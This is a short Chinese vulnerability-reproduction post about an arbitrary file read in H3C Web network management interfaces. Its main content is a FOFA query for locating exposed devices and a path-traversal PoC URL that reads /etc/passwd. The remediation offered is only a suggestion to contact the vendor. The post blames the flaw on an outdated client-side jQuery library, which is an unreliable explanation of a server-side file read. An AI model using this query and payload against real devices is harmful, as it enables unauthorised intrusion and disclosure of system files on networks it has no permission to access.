【漏洞复现】H3C Web网管登录任意文件读取漏洞
时间:2024-04-25 13:45:33 来源:网络cs 作者:往北 栏目:卖家故事 阅读:
阅读本书更多章节>>>>
Nx01 产品简介
H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。
Nx02 漏洞描述
jquery旧版本存在任意文件读取漏洞,允许攻击者在受害者的服务器上读取任意文件。H3CWeb网管部分使用过时的jquery版本导致存在任意文件读取漏洞。
Nx03 产品主页
fofa-query: body="/webui/js/jquerylib/jquery-1.7.2.min.js"
Nx04 漏洞复现
POC:
/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
Nx05 修复建议
建议联系软件厂商进行处理。
阅读本书更多章节>>>>本文链接:https://www.kjpai.cn/gushi/2024-04-25/162141.html,文章来源:网络cs,作者:往北,版权归作者所有,如需转载请注明来源和作者,否则将追究法律责任!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
下一篇:返回列表